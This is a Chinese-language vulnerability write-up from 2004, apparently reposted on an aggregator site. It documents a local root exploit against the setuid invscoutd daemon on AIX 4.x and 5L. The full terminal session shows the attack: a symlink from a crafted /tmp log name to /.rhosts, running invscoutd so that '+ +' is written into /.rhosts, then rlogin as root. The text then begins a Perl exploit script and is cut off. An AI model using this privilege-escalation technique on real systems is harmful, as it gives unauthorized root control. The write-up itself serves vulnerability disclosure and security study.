1、AIX捉虫记之__invscoutdAIX捉虫记之__invscoutd创建时间：2004-06-04 更新时间：2004-06-04文章属性：原创文章提交：watercloud (watercloud_at_xfocus.org)AIX捉虫记之invscoutd本文是考查AIX安全性时的一小段笔记(其实就是屏幕copy) ， 整理了一下加了点注释 ， 和有兴趣的朋友分享 :) 文中涉及到我发现的一个AIX4.x & 5L上的漏洞 ， 可以使普通用户获得root权限 ， 现在IBM好像还没有补丁 ， 望大家善用之 时间：2003-5-3日天气：晴 ， 万里无云的天空飘着几朵小小的白云今天心情很好 ， 前两天捉AIX的安全 。

2、BUG很有收获 ， 栈堆溢出、堆溢出、格式串、PATH欺骗执行命令等都有了 ， 今天继续平台信息：-bash-2.05b$ oslevel5.1.0.0-bash-2.05b$ oslevel -r5100-01按八字排列今天应该考查invscoutd命令了-bash-2.05b$ ls -l /usr/sbin/invscoutd-r-sr-xr-x 1 root system 217868 Aug 03 2001 /usr/sbin/invscoutd|+-考查理由? 需要么？谁叫他带了这个s位！首先了解一下这个命令是哪个道上混的-bash-2.05b$man invscoutd The invs 。

3、coutd command implements a permanent Inventory Scout server daemon onone machine in a users local network. The usual client is a Java applet runningin the users Web browser, which was downloaded from a central Inventory ScoutCGI application.赖着性子看完 ， 瞌睡ing .再来看看这个命令的长相：-bash-2.05b$ invscoutd invscoutd: 。

4、 Missing log file name.Inventory Scout Daemon 2.0.2. CAT VERSION USAGE: invscoutd options logfile B的符号连接不就行了!ln -s B A然后invscoutd A应该就成了 。
开始行动：-bash-2.05b$ ls -l /.rhostsls: 0653-341 The file /.rhosts does not exist.建立A - B的符号链接：-bash-2.05b$ perl -e symlink /.rhosts,/tmp/ccn+ +ndd;
这里B是/.rhostsA是/tmp/ 。

5、ccn+ +ndd-bash-2.05b$ ls -l /tmp/cc*lrwxrwxrwx 1 cloud staff 8 May 03 04:02 /tmp/cc+ +dd - /.rhosts来 ， 执行之-bash-2.05b$ perl -e system invscoutd,/tmp/ccn+ +ndd;
Inventory Scout Version 1.3.0.0Logic Database Version 1.3.0.0Exit code 2, pid 536968072.-bash-2.05b$ ps -ef |grep invsccloud 16282 1 0 03:59:27 。

6、 - 0:00 invscoutd /tmp/bbbbb?+ +?dddcloud 17146 15338 1 04:03:40 pts/0 0:00 grep invsc-bash-2.05b$ kill -9 16282-bash-2.05b$ perl -e system invscoutd,/tmp/ccn+ +ndd;
Inventory Scout Version 1.3.0.0Logic Database Version 1.3.0.0Start invscoutd 2.0.2:p=808 u=0 v=18 t=30 d=50000 pid=17150flog=/tmp/cc+ + 。

7、dd看看文件生成了没有：-bash-2.05b$ ls -l /.rhosts-rw-r-r- 1 root staff 598 May 03 04:03 /.rhostsok ， 来继续看看内容:-bash-2.05b$ cat /.rhosts2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Inventory Scout Version 1.3.0.02003/05/03 04:03:33 G17144:invscoutd_2.0.2 Logic Database Version 1.3.0.02003/05/03 04:03:33 G17144:invs 。

8、coutd_2.0.2 Bind error, port 808: The socket name is already in use.2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Exit code 2, pid 536968072.2003/05/03 04:03:48 G14270:invscoutd_2.0.2 Inventory Scout Version 1.3.0.02003/05/03 04:03:48 G14270:invscoutd_2.0.2 Logic Database Version 1.3.0.02003/05/03 04:0 。

9、3:48 P17150:invscoutd_2.0.2 Start invscoutd 2.0.2:p=808 u=0 v=18 t=30 d=50000 pid=17150flog=/tmp/cc+ +dd呵呵+ +写进去了!来 ， 用root用户 rlogin localhost登陆系统 ， 这样就能取得root权限了：-bash-2.05b$ rlogin -l root localhostusage: rlogin host -ex -l username -f|-F -k realm -8 faint ! 一高兴起来就连命令格式都给忘了 :(再来：-bash-2.05b$ rlogin lo 。

10、calhost -l root* * * Welcome to AIX Version 5.1! * * * Please see the README file in /usr/lpp/bos for information pertinent to * this release of the AIX Operating System. * * *-bash-2.05b# -好爽的特权#提示附耶！-bash-2.05b# iduid=0(root) gid=0(system) groups=2(bin),3(sys),7(security),8(cron),10(audit),11(lp)哈 。

11、哈哈搞定啦偶麻雀变root啦学了这么多年的Unix知识终于没白学呀热泪盈框ing 继续感动ing！￥ ， 还在陶醉！ ！ ！好啦好啦自恋狂！该干活啦简单清理战场-bash-2.05b# rm /.rhosts-bash-2.05b# rm /tmp/bb* /tmp/cc*-bash-2.05b# ps -ef |grep invsccloud 14306 15338 1 04:05:51 pts/0 0:00 grep invsccloud 17150 1 0 04:03:48 - 0:00 invscoutd /tmp/cc?+ +?dd-bash-2.05b# kill -9 17150-b 。

12、ash-2.05b#还看呀？！已经拉下帷幕了 ， 都是后台操作了！_= 后记 =这个漏洞在Aix4.x上也存在 ， 去年一个罗马IBM的工程师给我讲高版本的invscoutd系统 没有这个安全bug了 ， 但最近我重装了一个5.1 update到2004-5月出的ML06后还是有这个问题 ， 比较奇怪 :-(最后附上根据以上内容编写的利用程序 x_aix4x-5l_invscoutd.pl#!/usr/bin/perl# FileName: x_invscoutd.pl# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.# Tested : on A 。

13、ix4.3.3 & Aix5.1. # Some high version of invscoutd is not affected.# Author : watercloudnsfocus # watercloudxfocus.org # Date : 2003-5-29# Announce: use as your owner risk!$LOG=/tmp/.ex/.hellon+ +nworld;

稿源：(未知)

【傻大方】网址：/a/2021/0813/0023654059.html

标题：aix|aix捉虫记之__invscoutd